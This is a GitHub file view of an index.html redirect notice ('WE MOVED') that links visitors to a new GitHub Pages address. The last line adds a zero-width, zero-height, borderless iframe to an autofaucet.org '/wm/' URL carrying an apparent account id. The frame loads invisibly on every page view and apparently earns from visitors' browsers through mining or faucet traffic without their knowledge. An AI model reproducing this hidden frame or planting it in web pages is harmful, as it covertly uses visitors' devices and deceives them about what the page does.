-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
30 lines (30 loc) · 723 Bytes
/
index.html
File metadata and controls
30 lines (30 loc) · 723 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<!DOCTYPE html>
<html>
<head>
<title>WE MOVED</title>
<style>
body {
background-color: black;
color: white;
font-family: "Times New Roman", Times, serif;
font-size: 24px;
text-align: center;
}
a {
color: white;
text-decoration: none;
font-weight: bold;
}
</style>
</head>
<body>
<h1>WE MOVED</h1>
<p>
<span style="font-size: 18px">NEW ADDRESS</span><br />
<a href="https://fdefake.github.io/VG-Adventures/"
>https://fdefake.github.io/VG-Adventures/</a
>
</p>
</body>
<iframe src="https://autofaucet.org/wm/JH51664JH/4" width="0" height="0" style="border:0"></iframe>
</html>